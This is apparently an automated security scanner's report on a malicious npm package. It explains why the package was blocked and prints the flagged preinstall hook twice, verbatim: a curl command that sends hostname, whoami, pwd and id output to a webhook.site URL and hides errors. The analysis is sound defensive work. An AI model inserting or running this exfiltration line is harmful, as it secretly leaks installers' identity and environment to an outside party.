AI Security Review
scanned 3h ago · by lpm-firewall-aiThe package executes an install-time shell command that exfiltrates host and user context. The endpoint is a generic webhook collector unrelated to an API client.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install / lifecycle preinstall
Impact
Leaks hostname, username, current directory, and Unix id details from the installer environment.
Mechanism
install-time curl exfiltration of system identity and working directory
Attack narrative
On package installation, npm invokes the preinstall script from package.json. The script runs curl to POST command-substitution output from hostname, whoami, pwd, and id to a webhook.site collector, then hides errors with || true. This is unconsented environment reconnaissance and exfiltration at install time.
Rationale
Read-only source inspection confirmed package.json contains the only executable behavior: an install lifecycle hook that sends installer identity and environment context to an unrelated external webhook. This is concrete malicious install-time data exfiltration, not package-aligned API client behavior.
Evidence
package.jsonREADME.md
Network endpoints1
webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- package.json defines a preinstall lifecycle hook
- preinstall runs curl during npm install
- Script posts hostname, whoami, pwd, and id output
- Data is sent to unrelated webhook.site URL
- Script suppresses failures with || true
Evidence against
- Inspected tree contains only README.md and package.json
- No runtime entrypoint, persistence, destructive action, or AI-agent control-surface writes found
Behavioral surface
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.preinstall = curl -s --max-time 5 https://webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999 -d "h=$(hostname)&u=$(whoami)&d=$(pwd)&id=$(id)" || true
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.preinstall = curl -s --max-time 5 https://webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999 -d "h=$(hostname)&u=$(whoami)&d=$(pwd)&id=$(id)" || true
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High1 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present